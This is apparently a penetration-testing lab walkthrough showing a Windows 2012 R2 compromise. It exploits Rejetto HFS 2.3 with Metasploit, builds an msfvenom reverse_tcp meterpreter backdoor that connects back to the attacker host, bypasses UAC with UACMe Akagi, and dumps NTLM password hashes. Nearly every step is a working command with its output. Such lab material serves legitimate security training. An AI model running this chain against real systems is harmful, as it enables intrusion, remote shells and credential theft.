🔬UAC Bypass
Lab 1
Target IP:
10.4.19.119
UAC bypass
Some useful Win CMD commands
net user
net localgroup administrators
Enumeration
nmap 10.4.19.119
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49175/tcp open unknown
Determine the version information of the web server on port
80
nmap -sV -p 80 10.4.19.119
80/tcp open http HttpFileServer httpd 2.3

The version can be checked in a browser by opening the link
http://10.4.19.119/
Exploitation
msfconsole -q
Set the target IP as GLOBAL RHOSTS variable
setg RHOSTS 10.4.19.119
search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, if necessary
exploit

Use
meterpreter
commands to gain more information about the target
getuid
Server username: VICTIM\admin
sysinfo
Computer : VICTIM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language: en_US
Domain : WORKGROUP
Logged On Users: 2
Meterpreter : x86/windows
Migrate current x86
meterpreter
session to a x64 process
pgrep explorer
migrate 2708
Get
admin
user privileges
getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

Verify if
admin
user is part of the local administrators group
shell
net user
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
admin
Administrator
# "admin" user is a local administrator

In order to run programs or tasks with elevated privileges, UAC bypass is necessary
UAC Bypass & Privesc
UACMe Akagi executable is already present on the attack machine
ls /root/Desktop/tools/UACME/
Akagi64.exe
Generate a
meterpreter
payload withmsfvenom
ip -br -c a
eth1@if162568 UP 10.10.4.2/24
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > backdoor.exe
Set up a new
msfconsole
session and set up a listener withmulti/handler
, to receive the connection one the payload is executed on the targetset the payload used with
msfvenom
- thewindows/meterpreter/reverse_tcp
oneset the LHOST IP and LPORT of the attack machine, based on the
msfvenom
generated payload
msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.4.2
set LPORT 1234
run
The
reverse_tcp handler
is listening and ready to receive the connection from the malicious payloadHead back in the
meterpreter
session already opened
cd C:\\
mkdir Temp
cd Temp
# or use
# cd C:\\Users\\admin\\AppData\\Local\\Temp
upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe

UAC would prevent running
backdoor.exe
Run
Akagi64.exe
executable with UACMe methor 23
Akagi64.exe 23 C:\Temp\backdoor.exe

Elevated
meterpreter
session should be received on the listener

Migrate to a
NT AUTHORITY\SYSTEM
service
ps
ps -S lsass.exe
692
migrate 692

📌 Privileges successfully elevated by bypassing UAC on a system running Windows 2012 R2.
Dump hashes to get the flag
hashdump
admin:1012:aad3b435b51404eeaad3b435b51404ee:4d6583ed4cef81c2f2ac3c88fc5f3da6:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:659c8124523a634e0ba68e64bb1d822f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Last updated
Was this helpful?